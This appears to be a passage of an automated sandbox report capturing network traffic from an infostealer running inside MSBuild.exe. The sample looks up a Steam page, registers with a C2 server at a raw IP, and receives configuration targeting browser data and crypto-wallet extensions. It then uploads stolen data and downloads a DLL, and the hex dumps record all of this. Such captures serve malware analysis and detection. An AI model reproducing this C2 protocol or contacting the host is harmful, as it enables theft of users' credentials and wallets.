                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                        Cache-Control: no-cache
                                                                                        Date: Fri, 24 May 2024 08:27:02 GMT
                                                                                        Content-Length: 35682
                                                                                        Connection: close
                                                                                        Set-Cookie: sessionid=5c8036cc49444159af2608eb; Path=/; Secure; SameSite=None
                                                                                        Set-Cookie: steamCountry=US%7C493458b59285f9aa948bf050e0c9a39b; Path=/; Secure; HttpOnly; SameSite=None
                                                                                        2024-05-24 08:27:02 UTC14502INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                        2024-05-24 08:27:02 UTC10074INData Raw: 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 64 69 73 63 75 73 73 69 6f 6e 73 2f 22 3e 0d 0a 09 09 09 09 09 09 09 44 69 73 63 75 73 73 69 6f 6e 73 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 77 6f 72 6b 73 68 6f 70 2f 22 3e 0d 0a 09 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62
                                                                                        Data Ascii: lass="submenuitem" href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="sub
                                                                                        2024-05-24 08:27:02 UTC11106INData Raw: 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 46 52 4f 4d 5f 57 45 42 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 57 45 42 53 49 54 45 5f 49 44 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 43 6f 6d 6d 75 6e 69 74 79 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 42 41 53 45 5f 55 52 4c 5f 53 48 41 52 45 44 5f 43 44 4e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 68 61 72 65 64 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4c 41 4e 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6c 61 6e 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c
                                                                                        Data Ascii: &quot;,&quot;FROM_WEB&quot;:true,&quot;WEBSITE_ID&quot;:&quot;Community&quot;,&quot;BASE_URL_SHARED_CDN&quot;:&quot;https:\/\/shared.cloudflare.steamstatic.com\/&quot;,&quot;CLAN_CDN_ASSET_URL&quot;:&quot;https:\/\/clan.cloudflare.steamstatic.com\/&quot;,


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.44973478.47.123.1744436712C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-24 08:27:03 UTC186OUTGET / HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:03 UTC158INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:03 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        2024-05-24 08:27:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.44973778.47.123.1744436712C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-24 08:27:04 UTC278OUTPOST / HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----IIECFHDBAAECAAKFHDHI
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Content-Length: 279
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:04 UTC279OUTData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 30 43 38 38 44 32 43 39 46 39 33 33 31 35 38 38 32 31 30 39 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 32 65 33 33 34 30 66 37 66 36 34 30 30 38 34 30 31 66 61 35 37 38 37 61 38 38 32 61 66 34 35 0d 0a 2d 2d 2d 2d 2d 2d
                                                                                        Data Ascii: ------IIECFHDBAAECAAKFHDHIContent-Disposition: form-data; name="hwid"10C88D2C9F933158821099-a33c7340-61ca-11ee-8c18-806e6f6e6963------IIECFHDBAAECAAKFHDHIContent-Disposition: form-data; name="build_id"a2e3340f7f64008401fa5787a882af45------
                                                                                        2024-05-24 08:27:05 UTC158INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:05 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        2024-05-24 08:27:05 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 33 39 39 36 35 37 32 62 63 65 64 65 33 38 35 30 31 63 61 37 30 31 38 39 31 63 34 62 39 65 64 36 7c 31 7c 31 7c 31 7c 31 7c 31 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 3a1|1|1|1|3996572bcede38501ca701891c4b9ed6|1|1|1|1|1|50000|10


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.44974078.47.123.1744436712C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-24 08:27:05 UTC278OUTPOST / HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCB
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Content-Length: 331
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:05 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 39 36 35 37 32 62 63 65 64 65 33 38 35 30 31 63 61 37 30 31 38 39 31 63 34 62 39 65 64 36 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 32 65 33 33 34 30 66 37 66 36 34 30 30 38 34 30 31 66 61 35 37 38 37 61 38 38 32 61 66 34 35 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74
                                                                                        Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="token"3996572bcede38501ca701891c4b9ed6------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="build_id"a2e3340f7f64008401fa5787a882af45------AFHDAKJKFCFBGCBGDHCBCont
                                                                                        2024-05-24 08:27:06 UTC158INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:06 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        2024-05-24 08:27:06 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                        Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.44974378.47.123.1744436712C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-24 08:27:07 UTC278OUTPOST / HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAEC
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Content-Length: 331
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:07 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 39 36 35 37 32 62 63 65 64 65 33 38 35 30 31 63 61 37 30 31 38 39 31 63 34 62 39 65 64 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 32 65 33 33 34 30 66 37 66 36 34 30 30 38 34 30 31 66 61 35 37 38 37 61 38 38 32 61 66 34 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74
                                                                                        Data Ascii: ------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="token"3996572bcede38501ca701891c4b9ed6------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="build_id"a2e3340f7f64008401fa5787a882af45------KEBGHCBAEGDHIDGCBAECCont
                                                                                        2024-05-24 08:27:08 UTC158INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:07 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        2024-05-24 08:27:08 UTC5605INData Raw: 31 35 64 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                        Data Ascii: 15d8TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.44974478.47.123.1744436712C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-24 08:27:08 UTC278OUTPOST / HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDG
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Content-Length: 332
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:08 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 39 36 35 37 32 62 63 65 64 65 33 38 35 30 31 63 61 37 30 31 38 39 31 63 34 62 39 65 64 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 32 65 33 33 34 30 66 37 66 36 34 30 30 38 34 30 31 66 61 35 37 38 37 61 38 38 32 61 66 34 35 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74
                                                                                        Data Ascii: ------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="token"3996572bcede38501ca701891c4b9ed6------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="build_id"a2e3340f7f64008401fa5787a882af45------DAAFBAKECAEGCBFIEGDGCont
                                                                                        2024-05-24 08:27:09 UTC158INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:09 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        2024-05-24 08:27:09 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.44974778.47.123.1744436712C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-24 08:27:10 UTC279OUTPOST / HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----DGCAAFBFBKFIDGDHJDBK
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Content-Length: 6381
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:10 UTC6381OUTData Raw: 2d 2d 2d 2d 2d 2d 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 39 36 35 37 32 62 63 65 64 65 33 38 35 30 31 63 61 37 30 31 38 39 31 63 34 62 39 65 64 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 32 65 33 33 34 30 66 37 66 36 34 30 30 38 34 30 31 66 61 35 37 38 37 61 38 38 32 61 66 34 35 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 4b 0d 0a 43 6f 6e 74
                                                                                        Data Ascii: ------DGCAAFBFBKFIDGDHJDBKContent-Disposition: form-data; name="token"3996572bcede38501ca701891c4b9ed6------DGCAAFBFBKFIDGDHJDBKContent-Disposition: form-data; name="build_id"a2e3340f7f64008401fa5787a882af45------DGCAAFBFBKFIDGDHJDBKCont
                                                                                        2024-05-24 08:27:10 UTC158INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:10 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        2024-05-24 08:27:10 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 2ok0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.44974878.47.123.1744436712C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-24 08:27:11 UTC194OUTGET /sqls.dll HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:11 UTC248INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:11 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Length: 2459136
                                                                                        Last-Modified: Sun, 19 May 2024 16:18:18 GMT
                                                                                        Connection: close
                                                                                        ETag: "664a264a-258600"
                                                                                        Accept-Ranges: bytes
                                                                                        2024-05-24 08:27:11 UTC16136INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                        2024-05-24 08:27:11 UTC16384INData Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                        Data Ascii: X~e!*FW|>|L1146
                                                                                        2024-05-24 08:27:11 UTC16384INData Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b
                                                                                        Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
